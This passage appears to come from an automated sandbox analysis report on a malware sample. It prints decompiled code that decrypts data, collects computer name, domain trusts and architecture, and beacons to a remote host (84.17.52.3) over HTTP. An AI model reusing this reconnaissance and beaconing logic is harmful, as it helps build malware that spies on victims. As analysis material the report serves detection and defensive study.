                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184BE5
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184C0D
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184C1D
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00184C43
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00184C53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                            • API String ID: 1599918012-3917250287
                                            • Opcode ID: 79f0665c4cacd4eabb9d4de724dc2afdaca6df8198d77ba4c398a64c40e9769f
                                            • Instruction ID: dadf2178be672ca213489227cc0536e48efbaf2f4a7fd3545d1850996c8f9f8f
                                            • Opcode Fuzzy Hash: 79f0665c4cacd4eabb9d4de724dc2afdaca6df8198d77ba4c398a64c40e9769f
                                            • Instruction Fuzzy Hash: 9B317572E0021D7BFB25EAB89C8AFDF7AAD5B14780F0441E1B604E6181EB749F448F90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2CD0, Relevance: 12.1, APIs: 8, Instructions: 91encryptionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 137 1c2cd0-1c2d10 CryptAcquireContextA 138 1c2d1c-1c2d35 CryptCreateHash 137->138 139 1c2d12 137->139 141 1c2d3b-1c2d51 CryptHashData 138->141 142 1c2d37 138->142 140 1c2da0-1c2da4 139->140 143 1c2da6-1c2db0 CryptDestroyHash 140->143 144 1c2db7-1c2dbb 140->144 145 1c2d57-1c2d74 CryptDeriveKey 141->145 146 1c2d53 141->146 142->140 143->144 149 1c2dbd-1c2dc7 CryptDestroyKey 144->149 150 1c2dce-1c2dd2 144->150 147 1c2d7a-1c2d94 CryptDecrypt 145->147 148 1c2d76 145->148 146->140 151 1c2d9a-1c2d9d 147->151 152 1c2d96 147->152 148->140 149->150 153 1c2dd4-1c2de0 CryptReleaseContext 150->153 154 1c2de7-1c2ded 150->154 151->140 152->140 153->154
                                            C-Code - Quality: 37%
                                            			E001C2CD0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				long* _v16;
				int _v20;
				intOrPtr _v24;
				int _t32;
				intOrPtr _t33;
				long* _t35;

				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0x280011;
				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t32 != 0) {
					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8);
					if(_t32 != 0) {
						_t33 = _a16;
						__imp__CryptHashData(_v8, _a12, _t33, 0);
						if(_t33 != 0) {
							_t35 = _v12;
							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16);
							if(_t35 != 0) {
								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
									_v20 = _a8;
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					__imp__CryptDestroyHash(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					CryptDestroyKey(_v16);
					_v16 = 0;
				}
				if(_v12 != 0) {
					CryptReleaseContext(_v12, 0);
					_v12 = 0;
				}
				return _v20;
			}











                                            0x001c2cd6
                                            0x001c2cdd
                                            0x001c2ce4
                                            0x001c2ceb
                                            0x001c2cf2
                                            0x001c2d08
                                            0x001c2d10
                                            0x001c2d2d
                                            0x001c2d35
                                            0x001c2d3d
                                            0x001c2d49
                                            0x001c2d51
                                            0x001c2d68
                                            0x001c2d6c
                                            0x001c2d74
                                            0x001c2d94
                                            0x001c2d9d
                                            0x001c2d9d
                                            0x001c2d94
                                            0x001c2d74
                                            0x001c2d51
                                            0x001c2d35
                                            0x001c2da4
                                            0x001c2daa
                                            0x001c2db0
                                            0x001c2db0
                                            0x001c2dbb
                                            0x001c2dc1
                                            0x001c2dc7
                                            0x001c2dc7
                                            0x001c2dd2
                                            0x001c2dda
                                            0x001c2de0
                                            0x001c2de0
                                            0x001c2ded

                                            APIs
                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 001C2D08
                                            • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 001C2D2D
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                            • String ID:
                                            • API String ID: 1222261195-0
                                            • Opcode ID: d39b6a890fa48ea3ba55614102ce4731bc5bde88955e7894e8edb724428166d2
                                            • Instruction ID: 7df5eeff44b916eeeb46a04316285c3be730a6986454161226ec0f2ff56a5869
                                            • Opcode Fuzzy Hash: d39b6a890fa48ea3ba55614102ce4731bc5bde88955e7894e8edb724428166d2
                                            • Instruction Fuzzy Hash: 3931FC75A44208FBEB14CFE4DC59FEE7B78AB64705F208548F602A7280D7B4DA44DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C3400, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 155 1c3400-1c3428 call 1c14a0 GetModuleHandleA 158 1c342e-1c3444 GetProcAddress 155->158 159 1c342a-1c342c 155->159 161 1c344f-1c3453 GetSystemInfo 158->161 162 1c3446-1c344d GetNativeSystemInfo 158->162 160 1c346b-1c346e 159->160 163 1c3459-1c3460 161->163 162->163 164 1c3469 163->164 165 1c3462-1c3467 163->165 164->160 165->160
                                            C-Code - Quality: 75%
                                            			E001C3400() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				struct _SYSTEM_INFO _v48;

				E001C14A0( &_v48, 0, 0x24);
				_v8 = GetModuleHandleA("kernel32.dll");
				if(_v8 != 0) {
					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
					if(_v12 == 0) {
						GetSystemInfo( &_v48);
					} else {
						_v12( &_v48);
					}
					if((_v48.dwOemId & 0x0000ffff) != 9) {
						return 0;
					} else {
						return 1;
					}
				}
				return 0;
			}






                                            0x001c340e
                                            0x001c3421
                                            0x001c3428
                                            0x001c343d
                                            0x001c3444
                                            0x001c3453
                                            0x001c3446
                                            0x001c344a
                                            0x001c344a
                                            0x001c3460
                                            0x00000000
                                            0x001c3462
                                            0x00000000
                                            0x001c3462
                                            0x001c3460
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,001C1B21), ref: 001C341B
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001C3437
                                            • GetNativeSystemInfo.KERNEL32(?), ref: 001C344A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleInfoModuleNativeProcSystem
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 3469989633-192647395
                                            • Opcode ID: 8c8568c6222c0346ca32f51a4a9955b7cd941f777de10fe2bf5e9292aafa88e4
                                            • Instruction ID: 0c0fdac1da722e55d94acef6737ea833eceea2f9689e848f1bc0e6c188afb326
                                            • Opcode Fuzzy Hash: 8c8568c6222c0346ca32f51a4a9955b7cd941f777de10fe2bf5e9292aafa88e4
                                            • Instruction Fuzzy Hash: A4018131D44208EBCB08DBF49859FED7B78AB28711F10C559EA11A3180E774C684DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C1AA0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 190 1c1aa0-1c1b28 call 1c1420 GetVersion call 1c2630 call 1c30f0 call 1c2520 call 1c23c0 call 1c3400 203 1c1b69-1c1ba3 call 1c25b0 wsprintfA 190->203 204 1c1b2a-1c1b44 call 1c25b0 190->204 209 1c1ba6-1c1bad 203->209 207 1c1b49-1c1b67 wsprintfA 204->207 207->209 210 1c1baf-1c1bce call 1c1390 209->210 211 1c1bd2 209->211 210->211 213 1c1bd9-1c1bdd 211->213 215 1c1c68 213->215 216 1c1be3-1c1bf6 213->216 217 1c1c6a-1c1c6d 215->217 218 1c1bf8-1c1c07 call 1c2660 216->218 219 1c1c0a-1c1c24 call 1c28d0 216->219 218->219 223 1c1c29-1c1c33 219->223 224 1c1c44-1c1c48 223->224 225 1c1c35-1c1c41 call 1c1a00 223->225 226 1c1c4a-1c1c4f 224->226 227 1c1c51-1c1c63 224->227 225->224 226->217 227->213
                                            C-Code - Quality: 95%
                                            			E001C1AA0(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v324;
				char _v2372;
				char _v6468;
				intOrPtr _t47;
				intOrPtr _t56;
				char* _t63;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				char* _t72;
				void* _t75;
				char* _t89;
				intOrPtr _t95;
				char* _t104;
				intOrPtr _t106;
				void* _t110;
				void* _t113;
				void* _t114;

				_t95 = __edx;
				E001C1420(0x1940);
				_v12 = GetVersion();
				_t47 = E001C2630(_t95); // executed
				_v32 = _t47;
				_v28 = _t95;
				E001C30F0( &_v324); // executed
				E001C2520( &_v68,  &_v68); // executed
				E001C23C0( &_v2372); // executed
				_t113 = _t110 + 0xc;
				_v20 = _v12 & 0xff;
				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
				_t56 = E001C3400(); // executed
				_v36 = _t56;
				if(_v36 != 1) {
					_push(_v16);
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E001C25B0( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				} else {
					_push(_v16);
					_t75 = E001C25B0( &_v324); // executed
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				}
				if( *0x1c72a0 == 0) {
					_t71 = E001C1390(0x400);
					_t114 = _t114 + 4;
					 *0x1c72a0 = _t71;
					_t72 =  *0x1c72a0; // 0x42a408
					 *_t72 = 0;
				}
				_v24 = 1;
				while(_v24 == 1) {
					_t63 =  *0x1c72a0; // 0x42a408
					_t87 =  *_t63;
					if( *_t63 == 0) {
						_t106 =  *0x1c72a0; // 0x42a408
						_t70 = E001C2660(_t87, _t106);
						_t114 = _t114 + 4;
						_v24 = _t70;
					}
					_t89 =  *0x1c72a0; // 0x42a408
					_t66 = E001C28D0(_t89,  &_v6468, _a4, _a8, _a12); // executed
					_t114 = _t114 + 0x14;
					_v8 = _t66;
					if(_v8 == 1) {
						_t69 = E001C1A00(_t89, _a4);
						_t114 = _t114 + 4;
						_v8 = _t69;
					}
					if(_v8 != 1) {
						_t104 =  *0x1c72a0; // 0x42a408
						 *_t104 = 0;
						continue;
					} else {
						return 1;
					}
				}
				return 0;
			}































                                            0x001c1aa0
                                            0x001c1aa8
                                            0x001c1ab3
                                            0x001c1ab6
                                            0x001c1abb
                                            0x001c1abe
                                            0x001c1ac8
                                            0x001c1ad4
                                            0x001c1ae3
                                            0x001c1ae8
                                            0x001c1aff
                                            0x001c1b19
                                            0x001c1b1c
                                            0x001c1b21
                                            0x001c1b28
                                            0x001c1b6c
                                            0x001c1b9d
                                            0x001c1ba3
                                            0x001c1b2a
                                            0x001c1b2d
                                            0x001c1b44
                                            0x001c1b5e
                                            0x001c1b64
                                            0x001c1b64
                                            0x001c1bad
                                            0x001c1bb4
                                            0x001c1bb9
                                            0x001c1bbc
                                            0x001c1bc9
                                            0x001c1bce
                                            0x001c1bce
                                            0x001c1bd2
                                            0x001c1bd9
                                            0x001c1beb
                                            0x001c1bf0
                                            0x001c1bf6
                                            0x001c1bf8
                                            0x001c1bff
                                            0x001c1c04
                                            0x001c1c07
                                            0x001c1c07
                                            0x001c1c1d
                                            0x001c1c24
                                            0x001c1c29
                                            0x001c1c2c
                                            0x001c1c33
                                            0x001c1c39
                                            0x001c1c3e
                                            0x001c1c41
                                            0x001c1c41
                                            0x001c1c48
                                            0x001c1c59
                                            0x001c1c5f
                                            0x00000000
                                            0x001c1c4a
                                            0x00000000
                                            0x001c1c4a
                                            0x001c1c48
                                            0x00000000

                                            APIs
                                            • GetVersion.KERNEL32(?,001C18CD,?,00100000,?), ref: 001C1AAD
                                              • Part of subcall function 001C30F0: GetComputerNameA.KERNEL32(?,00000104), ref: 001C311A
                                              • Part of subcall function 001C30F0: lstrcatA.KERNEL32(00100000,?), ref: 001C312F
                                              • Part of subcall function 001C30F0: lstrcatA.KERNEL32(00100000, @ ), ref: 001C313E
                                              • Part of subcall function 001C30F0: lstrcatA.KERNEL32(00100000,?), ref: 001C3162
                                              • Part of subcall function 001C2520: lstrcpyA.KERNEL32(001C1AD9,84.17.52.3,?,?,001C1AD9,?,?), ref: 001C2540
                                              • Part of subcall function 001C23C0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,001C1AE8,?,?,001C1AE8,?,?,?), ref: 001C23E1
                                              • Part of subcall function 001C3400: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,001C1B21), ref: 001C341B
                                            • wsprintfA.USER32 ref: 001C1B5E
                                            • wsprintfA.USER32 ref: 001C1B9D
                                            Strings
                                            • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 001C1B52
                                            • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 001C1B91
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                                            • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                                            • API String ID: 768865819-2171647522
                                            • Opcode ID: 6f624fb805d8e6f883b6a84d8e33ebd04e795ed0a46ce36b1c4d4704b8b0ab55
                                            • Instruction ID: 81125cdf395b765cea67bfd699ab8ca82fb29ce171a984c8caa456400eeca14a
                                            • Opcode Fuzzy Hash: 6f624fb805d8e6f883b6a84d8e33ebd04e795ed0a46ce36b1c4d4704b8b0ab55
                                            • Instruction Fuzzy Hash: 57514CB2D04219ABDB18DB94DC52FFEB7B8BB69300F04816DF60697241E734DA85CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001917A0, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 82%
                                            			E001917A0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t12;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t12 = FindResourceA(__edx, _v8, _a4); // executed
				_t29 = _t12;
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00191730(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x191844
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00191730(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x191844
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x1916b4
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00191674(_t23, _t25, _t18);
			}


















                                            0x001917a7
                                            0x001917aa
                                            0x001917ac
                                            0x001917b7
                                            0x001917bc
                                            0x001917be
                                            0x001917c1
                                            0x001917c3
                                            0x001917c6
                                            0x001917cb
                                            0x001917cb
                                            0x001917cc
                                            0x001917d6
                                            0x001917d8
                                            0x001917db
                                            0x001917dd
                                            0x001917e0
                                            0x001917e5
                                            0x001917e6
                                            0x001917f0
                                            0x001917f1
                                            0x001917f5
                                            0x001917fe
                                            0x00191809

                                            APIs
                                            • FindResourceA.KERNEL32 ref: 001917B7
                                            • LoadResource.KERNEL32(00180000,00191844,00180000,?,00194890,0018F4D0,00180000,00000001,00000000,?,00191710,00194890), ref: 001917D1
                                            • SizeofResource.KERNEL32(00180000,00191844,00180000,00191844,00180000,?,00194890,0018F4D0,00180000,00000001,00000000,?,00191710,00194890), ref: 001917EB
                                            • LockResource.KERNEL32(001916B4,00000000,00180000,00191844,00180000,00191844,00180000,?,00194890,0018F4D0,00180000,00000001,00000000,?,00191710,00194890), ref: 001917F5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 51c1e61dcfffe8b7754b5a164afb9972288f8e23f8027a0d3c98afbb94ee287f
                                            • Instruction ID: 6ab115d26331fd6b9d2b012cab050ffda43a682322ef5eb5de3406071425d843
                                            • Opcode Fuzzy Hash: 51c1e61dcfffe8b7754b5a164afb9972288f8e23f8027a0d3c98afbb94ee287f
                                            • Instruction Fuzzy Hash: 1CF06DB36056057F9B08EE9CA881D5B77DDDFA82A03600019F908CB202DB30DE4147B8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C1390, Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C1390(long _a4) {
				void* _t4;
				void* _t6;

				if( *0x1c715c == 0) {
					 *0x1c715c = GetProcessHeap();
				}
				if( *0x1c715c == 0) {
					return 0;
				} else {
					_t6 =  *0x1c715c; // 0x390000
					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
					return _t4;
				}
			}





                                            0x001c139a
                                            0x001c13a2
                                            0x001c13a2
                                            0x001c13ae
                                            0x00000000
                                            0x001c13b0
                                            0x001c13b6
                                            0x001c13bd
                                            0x00000000
                                            0x001c13bd

                                            APIs
                                            • GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                            • RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateProcess
                                            • String ID:
                                            • API String ID: 1357844191-0
                                            • Opcode ID: 2bc351c381780131fc0edc8c2aff303822400431a21b18cd6ed43c56ef2fa349
                                            • Instruction ID: 4eaff079a9e7e93f886a7491d368d1b582847bb3b23a58d74ce1c9f1269f8931
                                            • Opcode Fuzzy Hash: 2bc351c381780131fc0edc8c2aff303822400431a21b18cd6ed43c56ef2fa349
                                            • Instruction Fuzzy Hash: D4E0EC3158C285EFD3489FA1EC1CF653FA8B316315F08641AE60586EA1C7B5D8D0CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C1FE0, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 1c1fe0-1c2054 call 1c14a0 InternetCrackUrlA 91 1c205d-1c2061 88->91 92 1c2056-1c2058 88->92 94 1c206a-1c206e 91->94 95 1c2063 91->95 93 1c222a-1c222d 92->93 96 1c207d-1c2089 call 1c24f0 94->96 97 1c2070-1c2074 94->97 95->94 101 1c208b-1c208d 96->101 102 1c2092-1c20a5 96->102 97->96 98 1c2076-1c2078 97->98 98->93 101->93 103 1c20a7-1c20b0 102->103 104 1c20b3-1c20da InternetConnectA 102->104 103->104 105 1c20dc-1c20de 104->105 106 1c20e3-1c210f HttpOpenRequestA 104->106 105->93 107 1c2111-1c211d InternetCloseHandle 106->107 108 1c2122-1c2126 106->108 107->93 109 1c2128-1c215a InternetQueryOptionA InternetSetOptionA 108->109 110 1c2160-1c21a0 HttpSendRequestA HttpQueryInfoA 108->110 109->110 111 1c2204-1c221f InternetCloseHandle * 2 110->111 112 1c21a2-1c21a6 110->112 113 1c2228 111->113 114 1c2221-1c2226 111->114 112->111 115 1c21a8-1c21ab 112->115 113->93 114->93 116 1c21b1-1c21b8 115->116 116->111 117 1c21ba-1c21d7 InternetReadFile 116->117 118 1c21d9-1c21dd 117->118 119 1c2200 117->119 118->119 120 1c21df-1c2202 118->120 119->111 120->116
                                            C-Code - Quality: 89%
                                            			E001C1FE0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
				void* _v8;
				long _v12;
				void* _v16;
				signed short _v20;
				signed int _v24;
				void _v28;
				void _v32;
				void* _v36;
				long _v40;
				long _v44;
				int _v48;
				intOrPtr _v60;
				char* _v64;
				signed short _v84;
				intOrPtr _v88;
				char* _v92;
				long _v96;
				void* _v108;
				char _v368;
				char _v628;
				int _t79;
				void* _t80;
				void* _t83;
				void* _t141;

				E001C14A0( &_v108, 0, 0x3c);
				_v108 = 0x3c;
				_v92 =  &_v368;
				_v88 = 0x104;
				_v64 =  &_v628;
				_v60 = 0x104;
				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
				if(_t79 != 0) {
					if(_v96 == 0) {
						_v96 = 3;
					}
					if(_v96 == 3 || _v96 == 4) {
						_t80 = E001C24F0(); // executed
						_v36 = _t80;
						if(_v36 != 0) {
							_v20 = _v84;
							_v24 = 0x84080100;
							if(_v96 == 4) {
								_v24 = _v24 | 0x00803000;
							}
							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
							_v16 = _t83;
							if(_v16 != 0) {
								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x1c7050, _v24, 1);
								if(_v8 != 0) {
									if(_v96 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
										_v28 = _v28 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
									}
									HttpSendRequestA(_v8, 0, 0, 0, 0); // executed
									_v32 = 0;
									_v44 = 4;
									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
									if(_v32 != 0xc8 || _a8 == 0) {
										L26:
										InternetCloseHandle(_v8); // executed
										InternetCloseHandle(_v16);
										if(_v32 != 0xc8) {
											return 0;
										}
										return 1;
									} else {
										 *_a16 = 0;
										while(1 != 0) {
											_v48 = InternetReadFile(_v8, _a8, _a12,  &_v12);
											if(_v48 != 1 || _v12 <= 0) {
												goto L26;
											} else {
												_a8 = _a8 + _v12;
												_a12 = _a12 - _v12;
												 *_a16 =  *_a16 + _v12;
												continue;
											}
										}
										goto L26;
									}
								}
								InternetCloseHandle(_v16);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}



























                                            0x001c1ff1
                                            0x001c1ff9
                                            0x001c2006
                                            0x001c2009
                                            0x001c2016
                                            0x001c2019
                                            0x001c2028
                                            0x001c2038
                                            0x001c204c
                                            0x001c2054
                                            0x001c2061
                                            0x001c2063
                                            0x001c2063
                                            0x001c206e
                                            0x001c207d
                                            0x001c2082
                                            0x001c2089
                                            0x001c2096
                                            0x001c209a
                                            0x001c20a5
                                            0x001c20b0
                                            0x001c20b0
                                            0x001c20cd
                                            0x001c20d3
                                            0x001c20da
                                            0x001c2108
                                            0x001c210f
                                            0x001c2126
                                            0x001c2128
                                            0x001c213d
                                            0x001c214b
                                            0x001c215a
                                            0x001c215a
                                            0x001c216c
                                            0x001c2172
                                            0x001c2179
                                            0x001c2193
                                            0x001c21a0
                                            0x001c2204
                                            0x001c2208
                                            0x001c2212
                                            0x001c221f
                                            0x00000000
                                            0x001c2228
                                            0x00000000
                                            0x001c21a8
                                            0x001c21ab
                                            0x001c21b1
                                            0x001c21d0
                                            0x001c21d7
                                            0x00000000
                                            0x001c21df
                                            0x001c21e5
                                            0x001c21ee
                                            0x001c21fc
                                            0x00000000
                                            0x001c2202
                                            0x001c21d7
                                            0x00000000
                                            0x001c21b1
                                            0x001c21a0
                                            0x001c2115
                                            0x00000000
                                            0x001c20dc
                                            0x00000000
                                            0x001c20dc
                                            0x001c20da
                                            0x00000000
                                            0x001c2076
                                            0x00000000
                                            0x001c2076
                                            0x001c206e
                                            0x00000000

                                            APIs
                                            • InternetCrackUrlA.WININET(001C1AD9,00000000,00000000,0000003C), ref: 001C204C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CrackInternet
                                            • String ID: <$GET
                                            • API String ID: 1381609488-427699995
                                            • Opcode ID: c627c61d03f191db30c1cbb062d703997058cc51b937a0243c68d637985fb5a9
                                            • Instruction ID: 74febb9b1f81d1ad0910ea92d81116d4bbd18d376c3b99c0df1f0ee86ea89bb5
                                            • Opcode Fuzzy Hash: c627c61d03f191db30c1cbb062d703997058cc51b937a0243c68d637985fb5a9
                                            • Instruction Fuzzy Hash: F271FA74E04209EFEB14CFA4D859FEEBBB5EB58700F108469E611AB280D7B59A84CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C3000, Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 166 1c3000-1c301e OpenProcess 167 1c3027-1c303c OpenProcessToken 166->167 168 1c3020-1c3022 166->168 170 1c303e-1c3040 167->170 171 1c3045-1c3062 GetTokenInformation 167->171 169 1c30e7-1c30ea 168->169 170->169 172 1c306f-1c3071 171->172 173 1c3064-1c306d GetLastError 171->173 172->169 173->172 174 1c3073-1c30a9 call 1c1390 GetTokenInformation 173->174 177 1c30d8-1c30e4 call 1c13d0 174->177 178 1c30ab-1c30cf LookupAccountSidA 174->178 177->169 178->177 179 1c30d1 178->179 179->177
                                            C-Code - Quality: 100%
